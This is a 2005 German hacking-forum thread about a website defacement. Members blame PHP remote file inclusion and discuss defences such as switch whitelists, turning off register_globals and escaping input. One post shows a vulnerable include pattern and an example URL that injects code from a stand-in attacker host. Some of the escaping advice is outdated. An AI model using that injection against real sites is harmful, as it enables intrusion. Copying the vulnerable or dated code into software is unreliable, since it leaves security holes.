[HaBo]

-Tux- · 10.01.05, 16:43

Hallo ein Freund von mir hat auf seiner Homepage diese Seite vorgefunden in seinem linken Frame diese Seite vor ich hab sie nur mal umbennant und im Log nachgeschaut. Jedoch fand ich keine Fehlversuche beim einlogen feststellen gekonnt. Was haltet ihr davon???
Hier ist die neu erstellte Seite der eindringlinge!

derhesse · 10.01.05, 16:55

Ich denke mal, die Jungs haben die schon lange bekannte Sicherheitslücke von PHP ausgenutzt. Include oder Require ohne Prüfung der Variable. Dies kann genutzt werden, um fremden Code auszuführen.

Anzeige

- Anzeige -

ICHdasICH · 10.01.05, 17:02

Hm, leicht nationalistischer hauch...
Naja...aber wenns n bekannter exploit war: Selbst schuld...bzw der Serverbetreiber.Sei froh, dass sie nur etwas defaced haben...

MfgICH

sieben · 10.01.05, 22:16

Zitat:

Original von ICHdasICH
Sei froh, dass sie nur etwas defaced haben...

Was macht dich da so sicher?

Prometheus · 11.01.05, 23:31

Bestimmt haben sich einpaar Kids dieser Realschule nur einen Spaß gemacht und sich mit falschen Namen und Nationalität ausgegeben. Wenn man auch schon bedenkt, das sie in der Schule eventuell auch auf gewisse Daten ZUgriff haben, ist sowas ein Kinderspiel. Zumal wenn ich mich noch an meinen Informatiklehrer errinnern konnte, der überhaupt gar keine Ahnung von Websicherheit und Webdesign hatte.

Imrahil · 21.02.05, 21:02

Ich hab mich ja jetzt mal in Google umgesehen, und leider nichts gefunden was in irgendeiner Hinsicht hilfreich wäre...
Worin besteht denn diese Gefahr beim include() bzw. require() ???
Da ich selber beide benutze wüsste ich das gerne um die Sicherheitslücke eventuell zu closen...
Reicht es da einen switch zu machen?
Also:
switch($site) {
case "home";
include("home.php");
break;
case "etc";
...
break;
}
Ist denn diese version unsicher?

if(@$site){
include($site.".php");
}
else{
require("home.php");
}

Hoffnung auf Hilfe hat,
Imrahil

treo · 21.02.05, 22:14

Es gibt sowas wie eine Include/Require Lücke nicht in PHP,
es war purer schwachfug des Scripters.
Dazu empfehle ich das hier mal zu lesen:
http://www.inside-php.de/board/topic-418.0-all.html

Imrahil · 21.02.05, 22:27

nun, es ist insofern eine sicherheitslücke als dass bei unsachgemäßer handhabung ein unbefugter sich zugriff verschaffen kann...
Ist es möglich auf die art und weise Code zu injezieren? ja oder nein?
Wenn ja wie kann man dies verhindern, also wie lasse ich es gar nicht erst zu diesem fehler kommen?
Imrahil

treo · 21.02.05, 22:29

man kann mit einer direktive verhindern das urls includet werden können
wenn man immer die eingaben der user prüft dann kann man es gar nicht erst dazu kommen lassen

Imrahil · 21.02.05, 23:07

also?
Unsicher ist gleich das hier:

Zitat:

if(@$site){
include($site.".php");
}
else{
include("home.php");
}

und sicher ist gleich das hier:

Zitat:

switch($site) {
case "home";
include("home.php");
break;
case "etc";
...
break;
}

Hab ich das richtig verstanden?
Oder kann man einfach http:// removen???

ghostdog · 22.02.05, 07:31

wenn du den user den user indirekt deine seitn steuern lassen kannst, kann er schlimmstenfalls deinen server zum abkacken bringen.
wenn du schreibst
if($site != ""){
include($site.".php");
}
else{
include("home.php");
}
http://xy.com/?site=http://haxor.org/boehse.php
die wird einfach eingefügt, wenn du case switch benutzt, dnan kann er die variable nicht beeinflussen

Imrahil · 22.02.05, 13:06

ok, dann mal vielen dank für die antworten!
Greetz Imrahil

The Dude · 23.02.05, 06:28

das beispiel mit $site sieht so aus als wuerdest du register_globals verwenden. dass will man natuerlich nicht. also stattdessen $HTTP_GET_VARS['site'], bzw. POST. davon gibts auch noch kurzvarianten die ich aber grad nicht auswendig weiss.

ich benutze in skripten eigentlich immer statt include() oder require() die funktion require_once(). ist nicht unbedingt sicherheitsrelevant aber kann nicht schaden.

ansonsten massnahmen gegen sql injection treffen. dafuer hab ich ne funktion sqlfix():
function sqlfix($s) {
return (get_magic_quotes_gpc()==1) ? mysql_escape_string($s) : "'".mysql_escape_string($s)."'";
}

hab ich glaube aus irgend nem kommentar auf php.net. die benutzt du ueberall wo benutzereingaben in sql queries integriert werden. ausser bei numerischen werten, da nehm ich is_numeric($HTTP_GET_VARS['userid']).

ausserdem kann man in der php.ini diese remote include funktionalitaet ausschalten. oder gleich safemode aktivieren, aber dann geht einiges nicht mehr.

ghostdog · 23.02.05, 13:39

achso ja hatte ich ganz vergessen, in deiner php.ini umbedingt register_globals auf 0 setzen. register_globals is evil

ivegotmail · 23.02.05, 16:56

wenn wir jetzt schon bei sql injection sind, sollte man auch noch ne möglichkeit gegen cross-site-scripting erwähnen.
also man sollte htmlspecialchars() verwenden, wenn die vom benutzer gemachten eingaben kein html enthalten dürfen.

Anzeige

- Anzeige -

10.01.05, 16:43	#1 (permalink)
-Tux- Registriert seit: 03.01.05 Likes: 0	HACKED BY iSKORPiTX Anzeige Hallo ein Freund von mir hat auf seiner Homepage diese Seite vorgefunden in seinem linken Frame diese Seite vor ich hab sie nur mal umbennant und im Log nachgeschaut. Jedoch fand ich keine Fehlversuche beim einlogen feststellen gekonnt. Was haltet ihr davon??? Hier ist die neu erstellte Seite der eindringlinge!

22.02.05, 07:31	#11 (permalink)
ghostdog Senior Member Registriert seit: 18.05.04 Likes: 0	wenn du den user den user indirekt deine seitn steuern lassen kannst, kann er schlimmstenfalls deinen server zum abkacken bringen. wenn du schreibst if($site != ""){ include($site.".php"); } else{ include("home.php"); } http://xy.com/?site=http://haxor.org/boehse.php die wird einfach eingefügt, wenn du case switch benutzt, dnan kann er die variable nicht beeinflussen __________________ Die neuen Desire Z und Desire HD Smartphones

23.02.05, 13:39	#14 (permalink)
ghostdog Senior Member Registriert seit: 18.05.04 Likes: 0	achso ja hatte ich ganz vergessen, in deiner php.ini umbedingt register_globals auf 0 setzen. register_globals is evil __________________ Die neuen Desire Z und Desire HD Smartphones

23.02.05, 16:56	#15 (permalink)
ivegotmail Member of Honour Registriert seit: 28.05.03 Likes: 1	wenn wir jetzt schon bei sql injection sind, sollte man auch noch ne möglichkeit gegen cross-site-scripting erwähnen. also man sollte htmlspecialchars() verwenden, wenn die vom benutzer gemachten eingaben kein html enthalten dürfen. __________________ http://livehabo.hackerboard.de \| http://livebb.sourceforge.net

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln

10.01.05, 16:55	#2 (permalink)
derhesse Registriert seit: 10.10.03 Likes: 3	Ich denke mal, die Jungs haben die schon lange bekannte Sicherheitslücke von PHP ausgenutzt. Include oder Require ohne Prüfung der Variable. Dies kann genutzt werden, um fremden Code auszuführen.

10.01.05, 17:02	#3 (permalink)
ICHdasICH Registriert seit: 24.11.04 Likes: 0	Hm, leicht nationalistischer hauch... Naja...aber wenns n bekannter exploit war: Selbst schuld...bzw der Serverbetreiber.Sei froh, dass sie nur etwas defaced haben... MfgICH

11.01.05, 23:31	#5 (permalink)
Prometheus Senior Member Registriert seit: 01.01.04 Likes: 0	Bestimmt haben sich einpaar Kids dieser Realschule nur einen Spaß gemacht und sich mit falschen Namen und Nationalität ausgegeben. Wenn man auch schon bedenkt, das sie in der Schule eventuell auch auf gewisse Daten ZUgriff haben, ist sowas ein Kinderspiel. Zumal wenn ich mich noch an meinen Informatiklehrer errinnern konnte, der überhaupt gar keine Ahnung von Websicherheit und Webdesign hatte.

21.02.05, 21:02	#6 (permalink)
Imrahil Registriert seit: 09.01.05 Likes: 0	Ich hab mich ja jetzt mal in Google umgesehen, und leider nichts gefunden was in irgendeiner Hinsicht hilfreich wäre... Worin besteht denn diese Gefahr beim include() bzw. require() ??? Da ich selber beide benutze wüsste ich das gerne um die Sicherheitslücke eventuell zu closen... Reicht es da einen switch zu machen? Also: switch($site) { case "home"; include("home.php"); break; case "etc"; ... break; } Ist denn diese version unsicher? if(@$site){ include($site.".php"); } else{ require("home.php"); } Hoffnung auf Hilfe hat, Imrahil

21.02.05, 22:14	#7 (permalink)
treo Registriert seit: 16.02.04 Likes: 0	Es gibt sowas wie eine Include/Require Lücke nicht in PHP, es war purer schwachfug des Scripters. Dazu empfehle ich das hier mal zu lesen: http://www.inside-php.de/board/topic-418.0-all.html

21.02.05, 22:27	#8 (permalink)
Imrahil Registriert seit: 09.01.05 Likes: 0	nun, es ist insofern eine sicherheitslücke als dass bei unsachgemäßer handhabung ein unbefugter sich zugriff verschaffen kann... Ist es möglich auf die art und weise Code zu injezieren? ja oder nein? Wenn ja wie kann man dies verhindern, also wie lasse ich es gar nicht erst zu diesem fehler kommen? Imrahil

21.02.05, 22:29	#9 (permalink)
treo Registriert seit: 16.02.04 Likes: 0	man kann mit einer direktive verhindern das urls includet werden können wenn man immer die eingaben der user prüft dann kann man es gar nicht erst dazu kommen lassen

22.02.05, 13:06	#12 (permalink)
Imrahil Registriert seit: 09.01.05 Likes: 0	ok, dann mal vielen dank für die antworten! Greetz Imrahil

23.02.05, 06:28	#13 (permalink)
The Dude Registriert seit: 13.11.04 Likes: 0	das beispiel mit $site sieht so aus als wuerdest du register_globals verwenden. dass will man natuerlich nicht. also stattdessen $HTTP_GET_VARS['site'], bzw. POST. davon gibts auch noch kurzvarianten die ich aber grad nicht auswendig weiss. ich benutze in skripten eigentlich immer statt include() oder require() die funktion require_once(). ist nicht unbedingt sicherheitsrelevant aber kann nicht schaden. ansonsten massnahmen gegen sql injection treffen. dafuer hab ich ne funktion sqlfix(): function sqlfix($s) { return (get_magic_quotes_gpc()==1) ? mysql_escape_string($s) : "'".mysql_escape_string($s)."'"; } hab ich glaube aus irgend nem kommentar auf php.net. die benutzt du ueberall wo benutzereingaben in sql queries integriert werden. ausser bei numerischen werten, da nehm ich is_numeric($HTTP_GET_VARS['userid']). ausserdem kann man in der php.ini diese remote include funktionalitaet ausschalten. oder gleich safemode aktivieren, aber dann geht einiges nicht mehr.

Ähnliche Themen
Thema	Autor	Forum	Antworten	Letzter Beitrag
Steam Acc. hacked - Hilfe	BadBoy52	Games	3	21.01.09 21:00
Hacked	ulbed	(In)security allgemein	22	18.06.07 15:25

[HaBo]

HACKED BY iSKORPiTX